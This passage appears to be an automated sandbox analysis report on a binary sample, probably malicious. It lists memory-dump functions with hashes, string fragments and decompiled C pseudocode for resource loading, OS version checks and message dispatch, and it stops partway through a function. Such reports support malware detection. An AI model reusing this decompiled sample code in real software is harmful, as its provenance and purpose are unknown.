Function 0472CAD5, Relevance: 3.9, Strings: 3, Instructions: 181COMMON

Download Yara Rule

Strings

1c, xrefs: 0472CB69
M[H, xrefs: 0472CB59
$mP, xrefs: 0472CC82

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: $mP$1c$M[H
API String ID: 0-1038945459
Opcode ID: 75850dec4e160c4138f8a15038321779158ad158894db4552ca60a6c19695715
Instruction ID: 0251dd6e81bd794d0aacd4a5790ae294df400078461a5494f5562c81568b2ea6
Opcode Fuzzy Hash: 75850dec4e160c4138f8a15038321779158ad158894db4552ca60a6c19695715
Instruction Fuzzy Hash: 708184711083409FD768CF26C58951FBBF1FBC4758F008A1DF19AA6260D7B1A9498F83

Uniqueness

Uniqueness Score: -1.00%

Function 04741B95, Relevance: 3.9, Strings: 3, Instructions: 161COMMON

Download Yara Rule

Strings

!]T, xrefs: 04741C36
$X, xrefs: 04741D53
o9F, xrefs: 04741C7C

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: !]T$o9F$$X
API String ID: 0-1500305597
Opcode ID: 6cf5098c01390007e51dd5b64ecc16965d9d63d79a87f35d9cad73f6c4eae3ce
Instruction ID: 719718279b87815c160a852159a338c9d880ac0e509b1f364f324d4de476b680
Opcode Fuzzy Hash: 6cf5098c01390007e51dd5b64ecc16965d9d63d79a87f35d9cad73f6c4eae3ce
Instruction Fuzzy Hash: 48715EB1109340AFC368DF21C58982BBBF1FBC5758F50891DF19A96260D7B19A49CF86

Uniqueness

Uniqueness Score: -1.00%

Function 0472193C, Relevance: 3.9, Strings: 3, Instructions: 157COMMON

Download Yara Rule

Strings

sx+, xrefs: 04721B0C
kz, xrefs: 04721991
+LM, xrefs: 04721A6F

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: +LM$kz$sx+
API String ID: 0-102189528
Opcode ID: 77d35d0dc3cd2a572a86a1381ad6d072893101492381106cb42321599aeb9621
Instruction ID: 123153ea24234c375d1962150a390c6e856850f584ba0e0032a8125b95a9f4f2
Opcode Fuzzy Hash: 77d35d0dc3cd2a572a86a1381ad6d072893101492381106cb42321599aeb9621
Instruction Fuzzy Hash: 7F7110715093809FC358CF61C68A51BFBF1BBC4B08F409A1CF59A96220D7B5DA09CF46

Uniqueness

Uniqueness Score: -1.00%

Function 04731BB7, Relevance: 3.9, Strings: 3, Instructions: 153COMMON

Download Yara Rule

Strings

f;, xrefs: 04731C04
rT, xrefs: 04731D77
t", xrefs: 04731D07

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: f;$t"$rT
API String ID: 0-603019792
Opcode ID: 8484c67ecfe83336e2c01f66cdd2e85c8f1c7aed6864173805869186731c4181
Instruction ID: 8a4b23fe2dc0688fdb19cd26b55a8a65b4eac1e320c4ecd72102fc6bbd0327ec
Opcode Fuzzy Hash: 8484c67ecfe83336e2c01f66cdd2e85c8f1c7aed6864173805869186731c4181
Instruction Fuzzy Hash: E7713071108340AFC358CF65C98A41FBBF1FBC8B58F504A0CF69696260D3B69A49CB83

Uniqueness

Uniqueness Score: -1.00%

Function 0472DD02, Relevance: 3.9, Strings: 3, Instructions: 145COMMON

Download Yara Rule

Strings

TU, xrefs: 0472DE15
wa, xrefs: 0472DEB0
2Ja, xrefs: 0472DE47

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: 2Ja$wa$TU
API String ID: 0-3933080688
Opcode ID: b9b07564a61da205ab0782d6cbfe867b7feccfb7455d23f7f8a59e0fef5a1c6e
Instruction ID: ad240bd56a1e2b23ac0b8d8032f099b04cad758571511075c65b119c544afa5c
Opcode Fuzzy Hash: b9b07564a61da205ab0782d6cbfe867b7feccfb7455d23f7f8a59e0fef5a1c6e
Instruction Fuzzy Hash: 055167B2D0031AEBDF64CFA4C98A5EEBBB1FF54314F20801DD505AA250E7B45A44CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0472E2D7, Relevance: 3.9, Strings: 3, Instructions: 137COMMON

Download Yara Rule

Strings

<m, xrefs: 0472E41C
1', xrefs: 0472E40C
unD, xrefs: 0472E2DA

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: 1'$<m$unD
API String ID: 0-3345171228
Opcode ID: ef76fa21d584bd631610d41878c2cab0469cf18152ebb3e7ee00558c8d9b309f
Instruction ID: f9666982e1d3d69e833f537bc192617d93a3f1b60c919d4449d1fcb02bcdd800
Opcode Fuzzy Hash: ef76fa21d584bd631610d41878c2cab0469cf18152ebb3e7ee00558c8d9b309f
Instruction Fuzzy Hash: 63611E715093419FD398CF22D98980BBBF1FBC4B48F509A0DF49696261D3B1EA098F82

Uniqueness

Uniqueness Score: -1.00%

Function 0472E09E, Relevance: 3.9, Strings: 3, Instructions: 133COMMON

Download Yara Rule

Strings

Th, xrefs: 0472E1DC
,g, xrefs: 0472E1CC
S, xrefs: 0472E167

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: S$Th$,g
API String ID: 0-1397277400
Opcode ID: 96f0b305d8cd7b0c873c585a340b8afc0602ff24c5afdf725dcf6098be9ac547
Instruction ID: a2aa48ba2766cdd43008c5ce4746ede7a746590b3d3b6f6e2207a32d4cd9255c
Opcode Fuzzy Hash: 96f0b305d8cd7b0c873c585a340b8afc0602ff24c5afdf725dcf6098be9ac547
Instruction Fuzzy Hash: 73519771609340AFD758CF21CA8585FBBE2FFC8748F50991DF58A96221D370DA488F82

Uniqueness

Uniqueness Score: -1.00%

Function 0472F574, Relevance: 3.9, Strings: 3, Instructions: 118COMMON

Download Yara Rule

Strings

S, xrefs: 0472F68D
JDT, xrefs: 0472F62B
G'9, xrefs: 0472F5D4

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID: ChangeCloseFindNotification
String ID: G'9$JDT$S
API String ID: 2591292051-3801382178
Opcode ID: 27b7fecabe4558f3e9d12b19bd924a60b6f07757302c97d7507c24ba3aae58a6
Instruction ID: fa651f5d749936a5363c720c844669a637898c3e2cad83e2c6a7f183d1b56f46
Opcode Fuzzy Hash: 27b7fecabe4558f3e9d12b19bd924a60b6f07757302c97d7507c24ba3aae58a6
Instruction Fuzzy Hash: 56512171D0121DABDF08CFA5C94A8EEBBB6FF88318F208059E514B7210D3B55A55CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 10001000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E10001000(void* __ecx, void* __esi, struct HINSTANCE__* _a4, struct HRSRC__* _a8, struct HINSTANCE__* _a12, struct HRSRC__* _a16) {
				void* _t12;
				signed int _t14;
				void* _t16;
				void* _t20;
				signed int _t23;
				void* _t25;
				void* _t26;
				signed int _t27;

				_t26 = __esi;
				_t34 = _a4 - 0x8007000e;
				if(_a4 == 0x8007000e) {
					E100056F5(_t20, __ecx, _t25, __esi, _t34);
				}
				_push(_a4);
				E10006E8E(_t20, _t25, _t26, _t34);
				asm("int3");
				_t12 = LoadResource(_a12, _a16);
				if(_t12 != 0) {
					_push(_t26);
					_t27 = LockResource(_t12);
					__eflags = _t27;
					if(_t27 == 0) {
						L10:
						_t14 = 0;
					} else {
						_t16 = SizeofResource(_a4, _a8) + _t27;
						_t23 = _a12 & 0x0000000f;
						__eflags = _t23;
						if(_t23 <= 0) {
							L9:
							__eflags = _t27 - _t16;
							if(_t27 < _t16) {
								asm("sbb eax, eax");
								_t14 =  ~( *_t27 & 0x0000ffff) & _t27;
								__eflags = _t14;
							} else {
								goto L10;
							}
						} else {
							while(1) {
								__eflags = _t27 - _t16;
								if(_t27 >= _t16) {
									goto L10;
								}
								_t23 = _t23 - 1;
								__eflags = _t23;
								_t27 = _t27 + 2 + ( *_t27 & 0x0000ffff) * 2;
								if(_t23 != 0) {
									continue;
								} else {
									goto L9;
								}
								goto L12;
							}
							goto L10;
						}
					}
					L12:
					return _t14;
				} else {
					return _t12;
				}
			}

0x10001000
0x10001000
0x10001008
0x1000100a
0x1000100a
0x1000100f
0x10001013
0x10001018
0x10001022
0x1000102a
0x1000102e
0x10001036
0x10001038
0x1000103a
0x10001064
0x10001064
0x1000103c
0x1000104b
0x1000104d
0x1000104d
0x10001050
0x10001060
0x10001060
0x10001062
0x1000106d
0x1000106f
0x1000106f
0x00000000
0x00000000
0x00000000
0x10001052
0x10001052
0x10001052
0x10001054
0x00000000
0x00000000
0x10001056
0x10001056
0x1000105a
0x1000105e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1000105e
0x00000000
0x10001052
0x10001050
0x10001071
0x10001073
0x1000102c
0x1000102d
0x1000102d

APIs

LoadResource.KERNEL32(?,?), ref: 10001022

Part of subcall function 100056F5: __CxxThrowException@8.LIBCMT ref: 1000570B

Strings

0Xxt0Ixt@6|t, xrefs: 10001022

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8LoadResourceThrow
String ID: 0Xxt0Ixt@6|t
API String ID: 2282096366-893219595
Opcode ID: d8ead5b29ec8218c5adbfc682d0492159c6c3cdfe1fcc751f7019d2a71d039a3
Instruction ID: c972b3faf9093e9138e327cb06fd5df42a0a5329fbac15a0fe0fd2cbd4f5deaa
Opcode Fuzzy Hash: d8ead5b29ec8218c5adbfc682d0492159c6c3cdfe1fcc751f7019d2a71d039a3
Instruction Fuzzy Hash: C8D0A73400428AFBEB015F51DC055497BA6EF046D5F10C024F44C05025DBB3DC90A641

Uniqueness

Uniqueness Score: -1.00%

Function 10006F89, Relevance: 3.0, APIs: 2, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10006F89(intOrPtr __ebx, intOrPtr __esi, void* __eflags) {
				signed int _v8;
				struct _OSVERSIONINFOA _v156;
				signed int _t9;
				intOrPtr _t21;
				intOrPtr _t22;
				char _t24;
				signed int _t27;

				_t25 = _t27;
				_t9 =  *0x10031c30; // 0x1f496801
				_v8 = _t9 ^ _t27;
				E10013A90(_t22,  &(_v156.dwMajorVersion), 0, 0x90);
				_v156.dwOSVersionInfoSize = 0x94;
				GetVersionExA( &_v156);
				return E100127FF(0 | _v156.dwPlatformId == 0x00000002, __ebx, _v8 ^ _t25, _t21, _t22, __esi, _t24);
			}

0x10006f8c
0x10006f94
0x10006f9b
0x10006fac
0x10006fbb
0x10006fc5
0x10006fe2

APIs

_memset.LIBCMT ref: 10006FAC
GetVersionExA.KERNEL32(?), ref: 10006FC5

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: Version_memset
String ID:
API String ID: 963298953-0
Opcode ID: f4a03a80cb43c37bd40a8304ddc8deb00d1379b721c7dc7dea92ef7ef3be7ad6
Instruction ID: da63170970faa05dbfa6c9cb61226b835dc66ece3e3b8ebe078a2f9e8259b8b3
Opcode Fuzzy Hash: f4a03a80cb43c37bd40a8304ddc8deb00d1379b721c7dc7dea92ef7ef3be7ad6
Instruction Fuzzy Hash: 7BF065759102189FDB50DB74CD8AB9E77B8AB08304F5044A4950DE62C2EE74AA898B41

Uniqueness

Uniqueness Score: -1.00%

Function 0473F43B, Relevance: 2.7, Strings: 2, Instructions: 238COMMON

Download Yara Rule

Strings

N<, xrefs: 0473F4CE
1x8*, xrefs: 0473F50E

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: 1x8*$N<
API String ID: 0-3986617354
Opcode ID: 80165d90e5d7e06aff73c3a6aaa5b1a68b890e585504ba84ba205ca2357da707
Instruction ID: 3cb45bec9b81224a7ab488f98cb1a57a87968c4ca3bd6c9aa43d653fca23105f
Opcode Fuzzy Hash: 80165d90e5d7e06aff73c3a6aaa5b1a68b890e585504ba84ba205ca2357da707
Instruction Fuzzy Hash: 5FA17D71A08341CBC768CF15C49956FBBE5FBD8789F000A1EF68686361E770A948DB93

Uniqueness

Uniqueness Score: -1.00%

Function 04721DB2, Relevance: 2.7, Strings: 2, Instructions: 214COMMON

Download Yara Rule

Strings

@PY, xrefs: 04721E44
I0, xrefs: 04721EDE

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: @PY$I0
API String ID: 0-1763363055
Opcode ID: 39d6663722098ff8172e3bae5a821c5fac96e95994a5037b69be5855aacf92d6
Instruction ID: f7060f05059269bf3476be469fd55421727b7fd09f370bccdd211a5795d7c566
Opcode Fuzzy Hash: 39d6663722098ff8172e3bae5a821c5fac96e95994a5037b69be5855aacf92d6
Instruction Fuzzy Hash: BFA1FDB26083419FC368CF25C98A80BBBE1FBC4758F108E1DF69596260D7B5DA49CF46

Uniqueness

Uniqueness Score: -1.00%

Function 0473EC2D, Relevance: 2.7, Strings: 2, Instructions: 184COMMON

Download Yara Rule

Strings

ceo, xrefs: 0473ED86
b(, xrefs: 0473EC53

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: ceo$b(
API String ID: 0-1873268517
Opcode ID: 978f6448bb7a311a48f7a561c8f1e0a2dc9ea2237d22be9dfb776786a243143e
Instruction ID: b17f4cd78218d20cfaa2cff4d8ae31d8fe1c1269b161c9e0c81bcf7144a443d0
Opcode Fuzzy Hash: 978f6448bb7a311a48f7a561c8f1e0a2dc9ea2237d22be9dfb776786a243143e
Instruction Fuzzy Hash: 2E817171508381ABD7A8CF24C58961FBBF1FBC4758F506A1DF0C596261D3B09A4ACB82

Uniqueness

Uniqueness Score: -1.00%

Function 0473708B, Relevance: 2.6, Strings: 2, Instructions: 137COMMON

Download Yara Rule

Strings

'HG, xrefs: 047372A4
'HG, xrefs: 04737250

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: 'HG$'HG
API String ID: 0-4061575402
Opcode ID: 45b00e2def0d04b2ffe86ee4332f07756d3b5582f1f73296b6d105837b4f12f2
Instruction ID: 462dc4a6358c2e14411563aeec256b6e866bb3722133ea8c1f99e45f29d183ba
Opcode Fuzzy Hash: 45b00e2def0d04b2ffe86ee4332f07756d3b5582f1f73296b6d105837b4f12f2
Instruction Fuzzy Hash: 3A511FB2109341AFC359DE61C98982FBBF4FB85749F404A0CF69652221D3B2DA09CB97

Uniqueness

Uniqueness Score: -1.00%

Function 0473D2E6, Relevance: 2.6, Strings: 2, Instructions: 131COMMON

Download Yara Rule

Strings

DUB%, xrefs: 0473D42C
GY, xrefs: 0473D43C

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: DUB%$GY
API String ID: 0-1451204059
Opcode ID: 5a9cc8fb165f251f80de6db9c46383144d1922211b7cd2b4b645216b6e610af1
Instruction ID: 9648d31c7787b32d0d6a421705db36349380022742026e27ee792f2b67b80a63
Opcode Fuzzy Hash: 5a9cc8fb165f251f80de6db9c46383144d1922211b7cd2b4b645216b6e610af1
Instruction Fuzzy Hash: 15516471508345AFD758CF21C98582BFBE1FBC8758F50992EF58A96221D370AA49CF83

Uniqueness

Uniqueness Score: -1.00%

Function 04724D32, Relevance: 2.6, Strings: 2, Instructions: 128COMMON

Download Yara Rule

Strings

Ccds, xrefs: 04724EBE
E2`:, xrefs: 04724D9D

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: Ccds$E2`:
API String ID: 0-2980592013
Opcode ID: 1ee67c1ecbcd4ea99809bab5f087fb091ac8728b83f3ee1933999a152072d5dd
Instruction ID: b5c1fb66f293bf50d8459d419c5eb29e009ebd753b86866d6461ff6ac21e3212
Opcode Fuzzy Hash: 1ee67c1ecbcd4ea99809bab5f087fb091ac8728b83f3ee1933999a152072d5dd
Instruction Fuzzy Hash: 795132B14093019FC754CF66CA8981BFBE1FBC8B48F504A1DF5A696220D3B1DA198B93

Uniqueness

Uniqueness Score: -1.00%

Function 04735CA0, Relevance: 2.6, Strings: 2, Instructions: 117COMMON

Download Yara Rule

Strings

g"G, xrefs: 04735D94
P}d, xrefs: 04735D09

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: P}d$g"G
API String ID: 0-1215663748
Opcode ID: ac03d891eaa61ca3ba080327e365a7fefa6d8d6199e6bacde615376c7c8560b7
Instruction ID: d8f5161e8abc6d9d61dbcf10c6cb7c526b5ac0f54dcfd8571b08f85b8dfae332
Opcode Fuzzy Hash: ac03d891eaa61ca3ba080327e365a7fefa6d8d6199e6bacde615376c7c8560b7
Instruction Fuzzy Hash: AD41AC7160D341AFC718CF25D58545FBBE1FBC8758F004A2EF58AA6260D374EA088B86

Uniqueness

Uniqueness Score: -1.00%

Function 0472606B, Relevance: 2.6, Strings: 2, Instructions: 114COMMON

Download Yara Rule

Strings

j/, xrefs: 04726120
5#4, xrefs: 047260B2

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: 5#4$j/
API String ID: 0-1549883620
Opcode ID: 5b778b42708e2fdc4b37ed8dda24638e8d0c6d6ac335e56f281534061473845d
Instruction ID: e039e1b4bf7a81beb9913934dc1a27ed18eb63fa3c7f77bd64a2ea5d120e6fd0
Opcode Fuzzy Hash: 5b778b42708e2fdc4b37ed8dda24638e8d0c6d6ac335e56f281534061473845d
Instruction Fuzzy Hash: 5F5146711093129FC758CF21DA8A82BBBE5FBD8758F005A1DF5D6A2221D7719A09CF83

Uniqueness

Uniqueness Score: -1.00%

Function 04736DF8, Relevance: 2.6, Strings: 2, Instructions: 106COMMON

Download Yara Rule

Strings

?, xrefs: 04736E72
\HT., xrefs: 04736E08

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: \HT.$?
API String ID: 0-4051257913
Opcode ID: f1db4fe828473ad894764a9794c14c9ba1bf6fecbe4c70a13270f5d207d01ae6
Instruction ID: c78c42f925cf096ff91dcc614fafecfeb2a7ea5b09d1e405afc001b1ae2c7540
Opcode Fuzzy Hash: f1db4fe828473ad894764a9794c14c9ba1bf6fecbe4c70a13270f5d207d01ae6
Instruction Fuzzy Hash: F741CD71608302ABC728EF25D58542FBBE1FBC4748F10091EF58696362D374EA89CB93

Uniqueness

Uniqueness Score: -1.00%

Function 04727A51, Relevance: 2.6, Strings: 2, Instructions: 76COMMON

Download Yara Rule

Strings

), xrefs: 04727B00
i{, xrefs: 04727AC6

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: )$i{
API String ID: 0-755552910
Opcode ID: 0f3ba2163f7d25871814b45df7eef46642d57e5d0fd6604f3836db27d1d4817f
Instruction ID: 39db5b95ec2f414fb8d9f58f2848d17af3b640916d77302c4ad5354b80cb9a37
Opcode Fuzzy Hash: 0f3ba2163f7d25871814b45df7eef46642d57e5d0fd6604f3836db27d1d4817f
Instruction Fuzzy Hash: BF3112B2D00209EBDF08CFE5D94A9EEBFB2BB44708F10815AD104B6250D7B95B45CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 1000B24B, Relevance: 2.0, APIs: 1, Instructions: 452
COMMONCrypto

Download Yara Rule

C-Code - Quality: 37%

			E1000B24B(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t156;
				signed int _t158;
				signed int* _t161;
				intOrPtr _t168;
				intOrPtr* _t169;
				signed int _t172;
				signed int _t175;
				signed int* _t179;
				signed int* _t182;
				signed int _t186;
				signed int _t190;
				signed int _t194;
				signed int _t198;
				signed int _t201;
				signed int* _t203;
				signed int _t204;
				signed int _t205;
				intOrPtr* _t206;
				signed int _t207;
				signed int _t222;
				signed int _t226;
				unsigned int _t233;
				void* _t234;

				_t209 = __ecx;
				_push(0x70);
				E10013978(E100258DA, __ebx, __edi, __esi);
				_t231 = __ecx;
				 *((intOrPtr*)(_t234 - 0x10)) = 0;
				 *((intOrPtr*)(_t234 - 0x14)) = 0x7fffffff;
				_t198 =  *(_t234 + 8);
				 *(_t234 - 4) = 0;
				if(_t198 != 0x111) {
					__eflags = _t198 - 0x4e;
					if(_t198 != 0x4e) {
						_t233 =  *(_t234 + 0x10);
						__eflags = _t198 - 6;
						if(_t198 == 6) {
							E1000AC04(_t209, _t231,  *((intOrPtr*)(_t234 + 0xc)), E1000953E(_t198, __ecx, _t233));
						}
						__eflags = _t198 - 0x20;
						if(_t198 != 0x20) {
							L12:
							_t156 =  *(_t231 + 0x4c);
							__eflags = _t156;
							if(_t156 == 0) {
								L20:
								_t158 =  *((intOrPtr*)( *_t231 + 0x28))();
								 *(_t234 + 0x10) = _t158;
								_t201 = (_t158 ^  *(_t234 + 8)) & 0x000001ff;
								E100081DA(_t201, _t234 - 0x14, _t231, _t233, 7);
								_t203 = 0x10056a00 + _t201 * 0xc;
								 *(_t234 - 0x18) = _t203;
								__eflags =  *(_t234 + 8) -  *_t203;
								if( *(_t234 + 8) !=  *_t203) {
									L25:
									_t161 =  *(_t234 - 0x18);
									_t204 =  *(_t234 + 0x10);
									 *_t161 =  *(_t234 + 8);
									_t161[2] = _t204;
									while(1) {
										__eflags =  *_t204;
										if( *_t204 == 0) {
											break;
										}
										__eflags =  *(_t234 + 8) - 0xc000;
										_push(0);
										_push(0);
										if( *(_t234 + 8) >= 0xc000) {
											_push(0xc000);
											_push( *((intOrPtr*)( *(_t234 + 0x10) + 4)));
											while(1) {
												_t205 = E10007A1D();
												__eflags = _t205;
												if(_t205 == 0) {
													break;
												}
												__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t205 + 0x10)))) -  *(_t234 + 8);
												if( *((intOrPtr*)( *((intOrPtr*)(_t205 + 0x10)))) ==  *(_t234 + 8)) {
													( *(_t234 - 0x18))[1] = _t205;
													E1000820E(_t234 - 0x14);
													L113:
													_t206 =  *((intOrPtr*)(_t205 + 0x14));
													L114:
													_push(_t233);
													L115:
													_push( *((intOrPtr*)(_t234 + 0xc)));
													L116:
													_t168 =  *_t206();
													L117:
													 *((intOrPtr*)(_t234 - 0x10)) = _t168;
													goto L118;
												}
												_push(0);
												_push(0);
												_push(0xc000);
												_t207 = _t205 + 0x18;
												__eflags = _t207;
												_push(_t207);
											}
											_t204 =  *(_t234 + 0x10);
											L36:
											_t204 =  *_t204();
											 *(_t234 + 0x10) = _t204;
											continue;
										}
										_push( *(_t234 + 8));
										_push( *((intOrPtr*)(_t204 + 4)));
										_t175 = E10007A1D();
										 *(_t234 + 0x10) = _t175;
										__eflags = _t175;
										if(_t175 == 0) {
											goto L36;
										}
										( *(_t234 - 0x18))[1] = _t175;
										E1000820E(_t234 - 0x14);
										L29:
										_t222 =  *((intOrPtr*)( *(_t234 + 0x10) + 0x10)) - 1;
										__eflags = _t222 - 0x53;
										if(__eflags > 0) {
											goto L118;
										}
										switch( *((intOrPtr*)(_t222 * 4 +  &M1000B80F))) {
											case 0:
												_push(E1000CBA0(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc)));
												goto L44;
											case 1:
												_push( *(__ebp + 0xc));
												goto L44;
											case 2:
												__eax = __esi;
												__eax = __esi >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = __si & 0x0000ffff;
